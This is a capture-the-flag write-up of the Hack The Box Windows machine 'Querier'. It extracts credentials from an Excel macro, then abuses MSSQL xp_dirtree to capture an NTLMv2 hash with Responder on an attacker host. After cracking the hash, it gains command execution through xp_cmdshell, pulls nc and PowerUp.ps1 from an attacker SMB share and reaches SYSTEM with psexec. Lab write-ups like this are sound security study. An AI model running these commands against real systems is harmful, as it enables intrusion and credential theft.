# HTB | Querier This is a Windows box. You can find it [here](https://app.hackthebox.com/machines/Querier). #### Skill Learned * Excel macros * PowerView ## NMAP IP: 10.10.10.125

nmap scan

### Port 139 and 445 smbclient

smbclient

Able to connect to Reports

smbclient Reports

get the file

Currency Volume Report.xlsm

## Foothold/shell It is Microsoft Excel 2007
``` binwalk -e ```
found vbaProject.bin in xl folder ``` cat vbaProject.bin | strings ```

cat vbaProject.bin | strings

found the username and password we can use this cred to login to mssql (port 1433) ``` mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth ```

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

``` select @@Version ```

select @@Version

To check for permission we have ``` SELECT * FROM fn_my_permissions(NULL, 'SERVER'); ```

SELECT * FROM fn_my_permissions(NULL, 'SERVER');

I can check out the databases available: ``` SELECT name FROM master.sys.databases ```

SELECT name FROM master.sys.databases

### Capture Net-NTLMv2 The *xp\_dirtree* command to get it to connect to me over SMB where we will be listening with the responder to capture the Net-NTLMv2. I’ll use *xp\_dirtree* to load a file, and I’ll tell the DB that the file is in an SMB share on my hosts. The server will try to authenticate to my host, where the responder will collect the Net-NTLMv2. ``` sudo responder -I tun0 ```

responder

Next, I’ll issue the connect to load a file using xp\_dirtree from an SMB share (that doesn’t exist) on my host: ``` xp_dirtree '\10.10.14.8\a'; ```

xp_dirtree '\10.10.14.8\a';

. on responder we have hashes

hash for mssql-svc

Since it is ntlmv2, we will use -m 5600

hashcat

cracked password

Let's connect with mssql-svc

mssqlclient

We can do cmd execution by using xp\_cmdshell ``` xp_cmdshell whoami ```

xp_cmdshell whoami

Note, the actual syntax to run a command is EXEC xp\_cmdshell '\[command]';. However, the client I’m using to connect, mssqlclient.py has a built-in command to run a command over xp\_cmdshell, so I can just type xp\_cmdshell \[command]. As mssql-svc, I can enable xp\_cmdshell (something I couldn’t do as reporting). Just like running a command, there is an alias to do this in the script. The full commands are (from Microsoft’s documentation () ): ``` enable_xp_cmdshell xp_cmdshell whoami ```
WindowsTo get a full shell on the box, there are many ways to go. I’ll host nc on an smb server, and let Windows run it from there.
found user.txt

user.txt

## Priv Esc Let's copy PoweUp.ps1 ``` xcopy \10.10.14.8\share\PowerUp.ps1 . ```

copying the PowerUp.ps1

``` powershell -ep bypass .\PowerUp.ps1 ```

.\PowerUp.ps1

In the GPP file, we found the Administrator password
Since we have a password we can use psexec ``` psexec.py administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125 ```

psexec.py administrator

we are in as nt authority\system

root.txt